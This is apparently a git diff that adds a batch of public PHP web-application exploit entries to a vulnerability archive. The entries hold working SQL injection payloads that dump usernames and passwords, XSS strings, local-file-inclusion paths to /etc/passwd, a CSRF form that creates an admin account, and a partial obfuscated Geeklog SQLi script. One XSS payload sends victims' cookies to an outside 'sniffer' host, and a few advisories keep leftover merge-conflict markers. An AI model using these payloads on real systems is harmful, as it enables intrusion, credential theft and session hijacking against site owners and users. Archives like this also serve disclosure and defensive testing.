ZVskYV0pOw0KCQljaGRpcigkaGFyZHN0eWxlWyRhXSk7DQoJCSRsZXZlbCsrOw0KCX0NCn0N
Cg0Kd2hpbGUoJGxldmVsLS0pIGNoZGlyKCIuLiIpOw0KDQokY2ggPSBjdXJsX2luaXQoKTsN
Cg0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZpbGU6ZmlsZTovLy8iLiRmaWxl
KTsNCg0KZWNobyAnPEZPTlQgQ09MT1I9IlJFRCI+IDx0ZXh0YXJlYSByb3dzPSI0MCIgY29s
cz0iMTIwIj4nOw0KDQppZihGQUxTRT09Y3VybF9leGVjKCRjaCkpDQoJZGllKCc+U29ycnku
Li4gRmlsZSAnLmh0bWxzcGVjaWFsY2hhcnMoJGZpbGUpLicgZG9lc250IGV4aXN0cyBvciB5
b3UgZG9udCBoYXZlIHBlcm1pc3Npb25zLicpOw0KDQplY2hvICcgPC90ZXh0YXJlYT4gPC9G
T05UPic7DQoNCmN1cmxfY2xvc2UoJGNoKTsNCg0KPz4=
"));
fclose($freiheit);
echo "exploit has been generated . use cx529.php file";
?>

10
platforms/php/webapps/32807.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33859/info
The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
gigCalendar 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23

10
platforms/php/webapps/32808.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33872/info
Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Magento 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/admin/
Username: "><script>alert('xss')</script>

10
platforms/php/webapps/32809.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33872/info
Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Magento 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/admin/index/forgotpassword/
Email address: "><script>alert('xss')</script>

9
platforms/php/webapps/32810.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33872/info
Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Magento 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E

73
platforms/php/webapps/32814.txt Executable file
View file

@ -0,0 +1,73 @@
# Exploit Title: Sendy 1.1.9.1 - SQL Injection Vulnerability
# Date: 2014-04-10
# Exploit Author: marduk369
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.9.1
root@kali:~# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:48:57
[11:48:57] [INFO] resuming back-end DBMS 'mysql'
[11:48:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c=10 AND SLEEP(5)&i=1
---
[11:48:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[11:48:58] [INFO] fetching tables for database: 'sendy'
[11:48:58] [INFO] fetching number of tables for database 'sendy'
[11:48:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[11:49:50] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[11:50:31] [INFO] adjusting time delay to 3 seconds due to good response times
9
[11:50:33] [INFO] retrieved: ap
[11:53:39] [ERROR] invalid character detected. retrying..
[11:53:39] [WARNING] increasing time delay to 4 seconds
ps
[11:56:31] [INFO] retrieved: ares
[12:00:00] [INFO] retrieved: ares_emails
[12:08:38] [INFO] retrieved: campaigns
[12:18:08] [INFO] retrieved: links
[12:24:28] [ERROR] invalid character detected. retrying..
[12:24:28] [WARNING] increasing time delay to 5 seconds
[12:24:31] [INFO] retrieved: lists
[12:29:49] [INFO] retrieved: login
[12:36:33] [ERROR] invalid character detected. retrying..
[12:36:33] [WARNING] increasing time delay to 6 seconds
[12:36:37] [INFO] retrieved: queue
[12:43:51] [INFO] retrieved: subscribers
Database: sendy
[9 tables]
+-------------+
| apps |
| ares |
| ares_emails |
| campaigns |
| links |
| lists |
| login |
| queue |
| subscribers |
+-------------+
[13:00:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/server1'
[*] shutting down at 13:00:16

7
platforms/php/webapps/32816.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33908/info
Orooj CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member

10
platforms/php/webapps/32819.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33914/info
Parsi PHP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u
ser/*

20
platforms/php/webapps/32823.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/33931/info
Irokez Blog is prone to multiple input-validation vulnerabilities:
- A cross-site scripting issue
- An SQL-injection issue
- Multiple remote file-include issues
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Irokez Blog 0.7.3.2 is vulnerable; other versions may also be affected.
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
http://www.example.com/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://www.example.com/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://www.example.com/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://www.example.com/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]

7
platforms/php/webapps/32827.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33943/info
Afian is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/path/css/includer.php?files=PATH_TO_FILES

11
platforms/php/webapps/32828.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/33944/info
Yektaweb Academic Web Tools CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Academic Web Tools CMS 1.5.7 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://www.example.com/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://www.example.com/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

50
platforms/php/webapps/32830.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: CubeCart 5.2.8 Session Fixation
# Exploit Author: James Sibley (absane)
# Blog: http://www.pentester.co
# Download link: http://www.cubecart.com/download/5.2.8/zip
# Discovery date: March 14th, 2014
# Vendor notified: March 15th, 2014
# Vendor fixed: April 10th, 2014
# Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/
# CVE assignment: CVE-2014-2341
CubeCart 5.2.8 is vulnerable to a session fixation vulnerability.
The only protection offered is via the User-Agent header field, which can spoofed to match the victim.
=======================
=Proof of Concept.....=
=======================
*Set the User-Agent for both attacker and victim:
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
*To attack a customer:
Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337
*To attack an administrator:
Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337
When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session.
=======================
=Cause................=
=======================
The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id.
The code handling login procedures do not generate new sessions upon successful authentication.
=======================
=Mitigation...........=
=======================
Upgrade to CubeCart >= 5.2.9
If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability:
In admin.class.php add this at line 324:
$GLOBALS['session']->restart();
In user.class.php add this at line 227:
$GLOBALS['session']->restart();

36
platforms/php/webapps/32831.txt Executable file
View file

@ -0,0 +1,36 @@
###########################################################
[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability
[~] Author: sajith
[~] version: Microweber CMS v0.93
[~]Vendor Homepage: http://microweber.com/
[~] vulnerable app link:http://microweber.com/download
###########################################################
[*] Application is vulnerable to CSRF.below is the POC where attacker can
use this vulnerability to create new user and assign Admin role to the user
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="
http://127.0.0.1/cms/microweber-0.9343/microweber-master/api/save_user"
id="formid" method="post">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="test1" />
<input type="hidden" name="password" value="mypassword" />
<input type="hidden" name="email" value="test@testing.com" />
<input type="hidden" name="first_name" value="abc" />
<input type="hidden" name="last_name" value="xyz" />
<input type="hidden" name="is_active" value="y" />
<input type="hidden" name="is_admin" value="y" />
<input type="hidden" name="basic_mode" value="n" />
<input type="hidden" name="api_key" value="1234" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

9
platforms/php/webapps/32835.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33968/info
NovaBoard is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
NovaBoard 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=

10
platforms/php/webapps/32840.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34016/info
Amoot Web Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/modir
Username:admin
Password: ' or '

9
platforms/php/webapps/32841.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34017/info
CMSCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMSCart 1.04 is vulnerable; other versions may also be affected.
http://www.example.com/cmscart/index.php?MenuLevel1=%27

9
platforms/php/webapps/32842.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34018/info
UMI CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to UMI CMS 2.7.1 (build 10856) are vulnerable.
http://www.example.com/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert(&#039;XSS&#039;)%3C/script%3E&fields_filter[price][1]=1

9
platforms/php/webapps/32843.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34021/info
TinX CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to TinX CMS 3.5.1 are vulnerable.
http://www.example.com/system/rss.php?id=1'SQL-code

9
platforms/php/webapps/32844.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34038/info
PHORTAIL is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
PHORTAIL 1.2.1 is vulnerable; other versions may also be affected.
<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head> <hr><pre> Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org </pre><hr> <form name="rapporter" action="http://www.example.com/poster.php" method="POST"></br> <input type="hidden" name="ajn" value="1"> <input type="text" name="pseudo" value="xss">=>Pseudo</br> <input type="text" name="email" value="xss@xss.com">=>E-mail</br> <input type="text" name="ti" value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br> <input type="text" name="txt" value="xss">=>text</br> <input type="submit" value="Start"></br> </form> </html>

10
platforms/php/webapps/32846.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34067/info
Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Nenriki CMS 0.5 is vulnerable; other versions may also be affected.
javascript:document.cookie ="password=1; path=/" then
javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"

9
platforms/php/webapps/32852.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34105/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-galleries.php/>"><Script>alert(1)</scRipt>

9
platforms/php/webapps/32853.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34106/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>

9
platforms/php/webapps/32854.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34107/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-listpages.php/>"><Script>alert(3)</scRipt>

11
platforms/php/webapps/32861.txt Executable file
View file

@ -0,0 +1,11 @@
[+] Local File Inclusion in WordPress Theme LineNity
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
[+] PoC: http://localhost/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
http://localhost/wordpress/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd

61
platforms/php/webapps/32867.txt Executable file
View file

@ -0,0 +1,61 @@
Details
================
Software: Quick Page/Post Redirect Plugin
Version: 5.0.3
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
Advisory ID: dxw-1970-1091
CVE: CVE-2014-2598
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
Description
================
CSRF and stored XSS in Quick Page/Post Redirect Plugin
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attackers choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admins browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
Proof of concept
================
Use the following form to introduce potentially malicious JavaScript:
<form method=\"POST\" action=\"http://localhost/wp-admin/admin.php?page=redirect-updates\">
<input type=\"text\" name=\"quickppr_redirects[request][]\" value=\""><script>alert(1)</script>\">
<input type=\"text\" name=\"quickppr_redirects[destination][]\" value=\"http://dxw.com/\">
<Input type=\"text\" name=\"submit_301\" value=\"1\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 5.0.5 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-03-21: Discovered
2014-03-24: Reported to plugins@wordpress.org
2014-04-07: No response; requested an alternative email address using the authors contact form.
2014-04-08: Re-reported direct to author
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
2014-04-10: Author reports issue fixed in version 5.0.5
<<<<<<< HEAD
Discovered by dxw:
================
Tom Adams
=======
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.

57
platforms/php/webapps/32868.txt Executable file
View file

@ -0,0 +1,57 @@
Details
================
Software: Twitget
Version: 3.3.1
Homepage: http://wordpress.org/plugins/twitget/
Advisory ID: dxw-1970-435
CVE: CVE-2014-2559
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N)
Description
================
CSRF/XSS vulnerability in Twitget 3.3.1
Vulnerability
================
If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.
Proof of concept
================
<form action=\"http://localhost/wp-admin/options-general.php?page=twitget/twitget.php\" method=\"POST\">
<input type=\"text\" name=\"twitget_username\" value=\"john_smith\">
<input type=\"text\" name=\"twitget_consumer_key\" value=\""><script>alert(\'dxw\')</script>\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 3.3.3 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2013-07-30: Discovered
2014-03-18: Reported to plugins@wordpress.org
2014-04-09: Author reports fixed in version 3.3.3.
<<<<<<< HEAD
Discovered by dxw:
================
Tom Adams
=======
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.

9
platforms/php/webapps/32871.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34193/info
ExpressionEngine is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
ExpressionEngine 1.6.4 through 1.6.6 are affected. Other versions may also be vulnerable.
chococat.gif"><script>alert('XSS')</script><div "a

9
platforms/php/webapps/32872.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34223/info
PHPizabi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPizabi 0.848b C1 HFP1 is vulnerable; other versions may also be affected.
http://www.example.com/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

9
platforms/php/webapps/32873.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34225/info
PHPCMS2008 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to PHPCMS2008 2009.03.17 are vulnerable.
http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

9
platforms/php/webapps/32875.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34232/info
Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Comparison Engine Power 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM

10
platforms/php/webapps/32880.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34324/info
Turnkey eBook Store is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Turnkey eBook Store 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?cmd=search&keywords="><script>alert('XSS')</script>
http://www.example.com/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http://www.example2.net">

14
platforms/php/webapps/32887.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34348/info
osCommerce is prone to a session-fixation vulnerability.
Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
The following are vulnerable:
osCommerce 2.2
osCommerce 3.0 Beta
Other versions may also be affected.
http://www.example.com/myapp/index.php?oscid=arbitrarysession

11
platforms/php/webapps/32889.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34355/info
4CMS is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The attacker can exploit the local file-include issue to execute arbitrary local script code and obtain sensitive information that may aid in further attacks.
http://www.example.com/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
http://www.example.com/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
http://www.example.com/frontend/index.php?chlang=../../../../etc/services%00

9
platforms/php/webapps/32905.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/linpha-1.3.2/login.php?ref=&#039;><script>alert(1)</ScRiPt>

10
platforms/php/webapps/32906.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E

10
platforms/php/webapps/32910.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
http://www.example.com/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="
alert('voodoo');&delete=1

9
platforms/php/webapps/32911.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
http://www.example.com/phorum-5.2.10/admin.php?module=banlist&curr=1"><img/src/onerror="alert('voodoo');&delete=1

12
platforms/php/webapps/32912.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
POST /www.example.com/admin.php HTTP/1.1
module=users&referrer=http%3A%2F%2Fwww.victim.com%2Fphorum-5.2.10%2Fadmin.php%3Fmodule%3Dusers
&addUser=1&username=xss&real_name=xss&email=%3Ciframe%2Fsrc%3D%22javascript%3Aalert%28%27voodoo%27%29%3B%22%3E&password1=xss&password2=xss&admin=0

11
platforms/php/webapps/32913.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34551/info
Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
javascript:with(document)cookie="phorum_upgrade_available=
<iframe/src='javascript:alert(/voodoo/.source)'>",
location="http://www.victim.com/phorum-5.2.10/versioncheck.php";

97
platforms/php/webapps/32914.php Executable file
View file

@ -0,0 +1,97 @@
source: http://www.securityfocus.com/bid/34553/info
Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Geeklog 1.5.2 and earlier are vulnerable.
tmp); $i++) {
$tmp_i = explode(";", $tmp[$i]);
$cookies .= $tmp_i[0]."; ";
}
if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) {
return $cookies;
} else {
die("[*] Unable to login!");
}
}
function xtrct_prefix() {
global $host, $port, $path, $cookies, $url;
$out = _s($url, $cookies, 0, "");
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
if (count($tmp) < 2) {
die("[!] Not logged in!");
}
$tmp = explode("\x22", $tmp[0]);
$prefix = $tmp[count($tmp)-1];
return $prefix;
}
function is_checked() {
global $host, $port, $path, $cookies, $url;
$out = _s($url, $cookies, 0, "");
$tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
$tmp = explode("\x3e", $tmp[1]);
$s = $tmp[0];
if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) {
return 1;
} else {
return 0;
}
}
if (!$_use_ck) {
$cookies = login();
}
$url = "http://$host:$port".$path."usersettings.php";
$prefix = xtrct_prefix();
print "[*] prefix->'".$prefix."'\n";
if (!$_skiptest) {
run_test();
}
if ($_test) {
die;
}
#uncheck all boxes
